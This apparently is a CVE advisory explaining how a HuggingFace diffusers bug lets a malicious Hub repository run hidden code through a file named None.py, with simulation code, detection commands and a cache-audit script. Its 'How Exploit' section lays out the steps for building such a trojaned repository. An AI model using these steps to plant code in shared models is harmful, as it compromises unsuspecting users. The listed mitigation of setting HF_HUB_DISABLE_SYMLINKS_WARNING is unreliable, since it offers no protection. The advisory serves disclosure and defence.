How the mentioned CVE works (technical details):
The vulnerability resides in `DiffusionPipeline.from_pretrained` when no `custom_pipeline` argument is supplied. Internally, `_resolve_custom_pipeline_and_cls` receives `custom_pipeline=None` and formats it as `f"{None}.py"`, which yields the string `"None.py"`. If a malicious HuggingFace Hub repository contains a file named `None.py`, the function treats it as a custom pipeline file. The `trust_remote_code` check lives only in `DiffusionPipeline.download()`, and that check is gated on a custom pipeline having been requested; with `custom_pipeline=None` the gate evaluates to `False` and the validation is skipped. Later, during the second `_get_pipeline_class` call, `None.py` is loaded and executed without any warning. The attacker can embed arbitrary Python code in `None.py`, shadowing a legitimate pipeline class (e.g., `FluxPipeline`) so that functionality is not broken. The malicious repo's `model_index.json` can declare `"_class_name": "FluxPipeline"`, making the payload invisible. If the model is not cached, `None.py` is automatically added to `allow_patterns` and downloaded. The victim only needs to run `DiffusionPipeline.from_pretrained('attacker/repo')`, with no `custom_pipeline` or `trust_remote_code` flags, and the RCE triggers silently, returning a fully functional pipeline.
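To make the logic bug concrete, here is an added, simplified model of the resolution flow described above. It is not diffusers' source code; the function names (`download_gate`, `resolve_custom_pipeline_vulnerable`, `resolve_custom_pipeline_fixed`, `load_pipeline`) and the sample repository file lists are invented for this illustration. Nothing is executed: "loading" a remote file just records its name, so the example shows why `None` formatted into a file name slips past a check that only fires when a custom pipeline was explicitly requested, and how an early `None` return closes the gap.

```python
# Added illustration of the f"{None}.py" resolution bug. NOT diffusers' code:
# a simplified model with invented function names. No remote code is run;
# the functions only report which repo file *would* be loaded.


def download_gate(custom_pipeline, trust_remote_code):
    """Models the trust_remote_code check in download(). It only fires when a
    custom pipeline was explicitly requested, so custom_pipeline=None passes.
    Returns True if loading may proceed."""
    if custom_pipeline is not None and not trust_remote_code:
        return False
    return True


def resolve_custom_pipeline_vulnerable(custom_pipeline, repo_files):
    """Faulty resolver: None is formatted straight into the file name, giving
    "None.py", which is then honoured if the repository ships such a file."""
    file_name = f"{custom_pipeline}.py"  # None -> "None.py"
    return file_name if file_name in repo_files else None


def resolve_custom_pipeline_fixed(custom_pipeline, repo_files):
    """Hardened resolver: no custom pipeline requested means no .py file is
    ever resolved, whatever the repository contains."""
    if custom_pipeline is None:
        return None
    file_name = f"{custom_pipeline}.py"
    return file_name if file_name in repo_files else None


def load_pipeline(repo_files, custom_pipeline=None, trust_remote_code=False,
                  resolver=resolve_custom_pipeline_vulnerable):
    """End-to-end model of from_pretrained(): the download gate runs first,
    then the resolver decides whether a repo-supplied .py file would be
    loaded. Returns ("blocked", None), ("clean", None) or
    ("remote-code", <file name that would execute>)."""
    if not download_gate(custom_pipeline, trust_remote_code):
        return ("blocked", None)
    file_name = resolver(custom_pipeline, repo_files)
    return ("remote-code", file_name) if file_name else ("clean", None)


# Constructed sample repository listings (file names only, no real content).
BENIGN_REPO = {"model_index.json", "unet/config.json"}
HOSTILE_REPO = {"model_index.json", "unet/config.json", "None.py"}

if __name__ == "__main__":
    print("vulnerable resolver, hostile repo:", load_pipeline(HOSTILE_REPO))
    print("fixed resolver, hostile repo:",
          load_pipeline(HOSTILE_REPO, resolver=resolve_custom_pipeline_fixed))
```

With the vulnerable resolver the hostile repository yields `("remote-code", "None.py")` even though the caller passed neither `custom_pipeline` nor `trust_remote_code`; with the fixed resolver the same call returns `("clean", None)`, and an explicitly requested custom pipeline is still refused unless `trust_remote_code=True`.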
dailycve form:
Platform: HuggingFace Diffusers
Version: <0.38.0
Vulnerability: Silent RCE
Severity: Critical
Date: 2024-07-22
Prediction: Patch already out
What Undercode Say:
Analytics – bash commands to verify and monitor:
```bash
# Check installed diffusers version
pip show diffusers | grep Version

# Find cached HuggingFace snapshots that contain a None.py file
find ~/.cache/huggingface/hub -name "None.py" -type f

# Audit custom pipeline usage in Python scripts (calls without trust_remote_code=True)
grep -r "from_pretrained" --include="*.py" . | grep -v "trust_remote_code=True"

# Monitor file creation from a malicious payload (example path /tmp/pwned)
auditctl -w /tmp/pwned -p wa -k diffusers_rce
```
How Exploit:
Attacker creates a Hub repo with:
– `None.py` containing a class inheriting `DiffusionPipeline` plus malicious code (e.g., write to /tmp/pwned).
– `model_index.json` with `"_class_name": "FluxPipeline"` (or any existing pipeline).
– Victim runs:
from diffusers import DiffusionPipeline
pipeline = DiffusionPipeline.from_pretrained("attacker/none-py-repo")
– Malicious code executes silently; pipeline loads normally.
Protection from this CVE:
Upgrade to `diffusers>=0.38.0`:
pip install --upgrade "diffusers>=0.38.0"
If upgrade impossible:
- Only load pipelines from trusted, audited sources.
- Never use `from_pretrained` on untrusted Hub repos.
- Manually inspect snapshots for unexpected `.py` files (especially `None.py`).
- Set environment variable `HF_HUB_DISABLE_SYMLINKS_WARNING=1` and review cached content.
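The `find` command in the analytics section and the "manually inspect snapshots" step above both amount to the same check: a model loaded without `custom_pipeline=` should never need a Python file in its snapshot. The following added script (not part of the original post or of the diffusers project) automates that audit. It assumes the standard cache layout `models--<org>--<name>/snapshots/<revision>/` under the default location `~/.cache/huggingface/hub`; the function names `audit_hf_cache`, `build_sample_cache` and `demo` are ours, and the sample cache it builds is constructed data with a placeholder `None.py`.

```python
# Added example, not part of the original post or the diffusers project.
# Audits a local HuggingFace hub cache for Python files inside model snapshots.
# Assumed layout: <cache>/models--<org>--<name>/snapshots/<revision>/...
import json
import tempfile
from pathlib import Path

DEFAULT_CACHE = "~/.cache/huggingface/hub"  # assumed default cache location


def _repo_id(repo_dir_name):
    # "models--attacker--none-py-repo" -> "attacker/none-py-repo"
    return repo_dir_name[len("models--"):].replace("--", "/", 1)


def audit_hf_cache(cache_dir=DEFAULT_CACHE):
    """Return one finding per .py file found in any cached model snapshot.
    None.py is flagged critical because it is the file name the buggy resolver
    derives from custom_pipeline=None; any other .py is marked for review,
    since loading it legitimately needs custom_pipeline and trust_remote_code."""
    findings = []
    cache = Path(cache_dir).expanduser()
    if not cache.is_dir():
        return findings
    for repo_dir in sorted(cache.glob("models--*")):
        snapshots = repo_dir / "snapshots"
        if not snapshots.is_dir():
            continue
        for snap in sorted(p for p in snapshots.iterdir() if p.is_dir()):
            declared = None
            index = snap / "model_index.json"
            if index.is_file():
                try:
                    # The declared class can look legitimate (e.g. FluxPipeline)
                    # while a shadowing None.py sits beside it, so report both.
                    declared = json.loads(index.read_text()).get("_class_name")
                except (ValueError, OSError, AttributeError):
                    declared = None
            for py in sorted(snap.rglob("*.py")):
                findings.append({
                    "repo": _repo_id(repo_dir.name),
                    "snapshot": snap.name,
                    "file": str(py.relative_to(snap)),
                    "declared_class": declared,
                    "severity": "critical" if py.name == "None.py" else "review",
                })
    return findings


def build_sample_cache(base_dir):
    """Construct a fake cache with one clean repo and one shipping None.py.
    Sample data only; nothing is downloaded or executed."""
    base = Path(base_dir)
    clean = base / "models--example--clean-model" / "snapshots" / "aaaa"
    hostile = base / "models--example--none-py-repo" / "snapshots" / "bbbb"
    for snap in (clean, hostile):
        (snap / "unet").mkdir(parents=True)
        (snap / "model_index.json").write_text(json.dumps({"_class_name": "FluxPipeline"}))
        (snap / "unet" / "config.json").write_text("{}")
    # Placeholder body only; the audit cares about the file's presence, not its content.
    (hostile / "None.py").write_text("# placeholder custom pipeline file\n")
    return str(base)


def demo():
    """Audit a constructed sample cache and return its findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_hf_cache(build_sample_cache(tmp))


if __name__ == "__main__":
    for f in audit_hf_cache():
        print(f"[{f['severity']}] {f['repo']}@{f['snapshot']}: "
              f"{f['file']} (declared {f['declared_class']})")
```

Run it as-is to audit the default cache, or pass another directory to `audit_hf_cache`. Any `review` finding is worth a second look too: a snapshot should only carry Python code if you deliberately loaded it with `custom_pipeline=` and `trust_remote_code=True`.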
Impact:
Full remote code execution (RCE) with no user interaction beyond loading a model. Attackers can steal credentials, modify files, install backdoors, or pivot into internal networks. The breach is silent – the pipeline appears functional, leaving no immediate crash or error logs. Affects all versions before 0.38.0, including automated pipelines in CI/CD, research notebooks, and production ML systems using HuggingFace diffusers.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

